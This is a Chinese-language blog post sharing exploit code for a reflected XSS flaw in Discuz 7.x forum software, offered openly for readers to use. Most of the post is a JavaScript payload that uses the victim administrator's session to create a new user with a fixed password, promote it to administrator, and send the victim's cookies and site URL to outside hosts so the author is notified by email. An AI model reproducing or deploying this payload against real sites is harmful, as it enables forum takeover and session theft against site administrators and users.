【Exp】discuz 7.x xss 利用代码

  • A+
所属分类:lcx

    discuz 7.X 有个反射型XSS,一直都没有补,读者可以去Google一下,以下是该XSS的利用代码,用ajax添加用户并加为管理员,再发邮件通知。大家拿去玩吧。

此反射型XSS在ajax.php中,exploit如下:

var type = "Discuz 7 ";
var username_add = "blackcushion020";

var getHost = function(url) {
        var host = "null";
        if(typeof url == "undefined"
                        || null == url)
                url = window.location.href;
        var regex = /(.*)ajax.php?(.*)/;
        var match = url.match(regex);
        if(typeof match != "undefined"
                        && null != match)
                host = match[1];
        return host;
}
function getURL(s) {
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = s;
}

var siteurl=getHost();
alert(siteurl);
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
xmlhttp.open("GET", siteurl+"admincp.php?action=members&operation=add", false);
xmlhttp.send(null);
var echo = xmlhttp.responseText;
var reg = / name="formhash" value="([wd]+)"/i;
var arr=reg.exec(echo);
if(!arr){
alert(document.cookie);
getURL("http://12.yifi8.cn/mail/phpwriter.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));
}
window.onerror=function(){return true;}
var formhash=arr[1];
alert(formhash);
var post="formhash="+formhash+"&anchor=&newusername="+username_add+"&newpassword=123456ab&newemail=dd23d2d7d%40126.com&newgroupid=10&emailnotify=0&addsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=add",false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post);

alert("aaaaaaa");
var echo2 = xmlhttp.responseText;
//var reg2 = /blackcushion013(UID([wd]+))/i;
//var reg2 = /用户(.*)添加成功/;
var reg2 = /blackcushion020(UID ([d]+))/i;
var arr2=reg2.exec(echo2);
var sid2=arr2[1];

var post2="formhash="+formhash+"&anchor=&groupidnew=1&adminidnew%5B0%5D=0&expirydatenew=&expgroupidnew=1&expadminidnew=1&editsubmit=%CC%E1%BD%BB";
xmlhttp.open("POST",siteurl+"admincp.php?action=members&operation=group&uid="+sid2,false);
xmlhttp.setRequestHeader("Referer", siteurl);
xmlhttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xmlhttp.setRequestHeader("content-length",post.length);
xmlhttp.setRequestHeader("content-type","application/x-www-form-urlencoded");
xmlhttp.send(post2);

getURL("http://baidu.cn/mail/phpmail.php?cookie="+encodeURIComponent(document.cookie)+"&siteurl="+encodeURIComponent(siteurl)+"&type="+encodeURIComponent(type));

    最后那句是邮件通知,phpmail.php是一个用JMAIL组件发信的PHP脚本(陆羽大牛好像发过一个,我那个就不传上来了,其实是一样的)

文章来源于lcx.cc:【Exp】discuz 7.x xss 利用代码

相关推荐: 【VB技巧】VB Select Case 条件判断执行语句

    VB Select Case 条件判断执行语句,VB Select Case 条件执行语句,VB Select Case 判断执行语句,VB Select Case 条件判断语句,VB Select Case 条件语句,VB Select Case 判…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: